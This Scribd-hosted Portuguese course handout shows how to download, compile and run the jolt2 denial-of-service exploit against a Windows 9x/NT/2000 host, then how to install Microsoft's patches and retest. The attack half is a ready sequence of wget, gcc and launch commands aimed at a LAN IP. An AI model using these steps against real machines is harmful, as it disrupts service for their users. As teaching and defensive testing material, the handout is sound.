Scribd Logo
Fazer o upload

Bem-vindo(a) ao Scribd!

  • HS03

    Enviado por

    Fabio Aires
    3 visualizações5 páginas

    Direitos autorais

    © © All Rights Reserved

    Formatos disponíveis

    DOC, PDF, TXT ou leia online no Scribd

    Você considera este documento útil?

    Este conteúdo é inapropriado?

    Denunciar este documento

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato DOC, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    3 visualizações5 páginas

    HS03

    Enviado por

    Fabio Aires

    Direitos autorais:

    © All Rights Reserved
    Baixe no formato DOC, PDF, TXT ou leia online no Scribd
    Sinalizar o conteúdo como inadequado
    de 5

    Aula 03 - Como os hackers

    conseguem travar a conexao de um


    Internauta com Windows
    95/98/ME/NT4/2000
    INTRODUÇÃO
    DoS abreviação de denial-of-service, negação de serviço, é uma condição que resulta quando um usuário
    maliciosamente torna inoperável um servidor de informações de uma rede negando serviço de computador a
    usuários legítimos. Se você tem um host Windows 95/98/ME/NT4/2000 disponibilizando recursos para uma
    rede, ele pode estar vulnerável a um ataque de DoS do exploit jolt2.

    PRÉ-REQUISITOS:
    Para compilar o exploit é necessário corrigir os links quebrados do pacote kernel-headers do Conectiva Linux
    7.0:

    ln –sf /usr/src/linux-2.4.5/include/linux/ /usr/include/linux

    ln –sf /usr/src/linux-2.4.5/include/asm /usr/include/asm

    Depois obtenha o exploit “jol2.c”:

    wget http://jeanchristian.com/exploits/jolt2.zip
    E prossiga descompactando-o:

    unzip jolt2.zip
    Protegendo o Windows 95/98/ME/NT4/2000 contra um ataque DoS
    Professor JeanChristian.com

    Na sequência compile o exploit:

    gcc –o jolt2 jolt2.c

    Supondo que o alvo do ataque seja uma estação Windows98 com IP 192.168.0.4, verifique se ela está visível
    na rede:

    ping 192.168.0.4 –c4


    Protegendo o Windows 95/98/ME/NT4/2000 contra um ataque DoS
    Professor JeanChristian.com

    Depois, teste o ataque a partir da estação Linux:

    ./jolt2 192.168.0.4

    Durante a execução do ataque, a máquina alvo ficará extremamente lenta parecendo que foi congelada.

    PROTEGENDO-SE CONTRA O ATAQUE DO JOLT2


    A Microsoft liberou patches que eliminam a vulnerabilidade de segurança que causa a paralização
    temporária de máquinas Windows 95/98/ME/NT/2000 causado pelo ataque do exploit jolt2.

    Para proteger seu sistema Windows 95/98/ME/NT/2000 desta vulnerabilidade, você deve instalar um dos
    patches fornecidos pela Microsoft de acordo com a versão do Windows que você está usando:

     Windows 95:
    http://download.microsoft.com/download/win95/update/8070/w95/EN-US/259728USA5.EXE

     Windows 98:
    http://download.microsoft.com/download/win98/update/8070/w98/EN-US/259728USA8.EXE
    Protegendo o Windows 95/98/ME/NT4/2000 contra um ataque DoS
    Professor JeanChristian.com

     Windows NT 4.0 Workstation, Server and Server, Enterprise Edition:


    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20829

     Windows 2000 Professional, Server and Advanced Server:


    http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20827

    Quando a instalação do patch for concluída, reinicie o Windows para que a atualização tenha efeito:
    Protegendo o Windows 95/98/ME/NT4/2000 contra um ataque DoS
    Professor JeanChristian.com

    Depois tente realizar um novo ataque com o exploit jolt2 contra a máquina protegida:

    ./jolt2 192.168.0.4
    Observe que após a instalação do patch a máquina alvo não ficará mais sujeita a uma paralização total, caso
    sofra um ataque do exploit jolt2. Mas, mesmo assim poderá ficar um pouco mais lenta que o normal.

    Você também pode gostar